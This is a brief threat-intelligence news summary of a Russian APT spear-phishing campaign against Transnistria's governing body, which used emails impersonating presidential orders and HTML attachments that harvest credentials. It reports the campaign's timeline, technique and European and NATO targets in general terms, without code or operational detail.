A Russian APT group has launched a sophisticated credential harvesting campaign targeting Transnistria’s governing body using disguised official emails and malicious HTML attachments. The operation forms part of a broader espionage effort focused on European and NATO-aligned entities. #RussianAPT #Transnistria
Keypoints
- The attack began on December 5, 2025, employing spear-phishing emails impersonating presidential orders.
- Malicious HTML files embed a blurred document requiring user login, facilitating credential theft.
- The phishing site uses complex JavaScript validation that still captures data regardless of password complexity.
- The campaign targets multiple European countries, NATO entities, and diplomatic missions, indicating widespread espionage activity.
- Using common web technologies and external infrastructure, the threat persists across a range of high-value targets in Eastern Europe.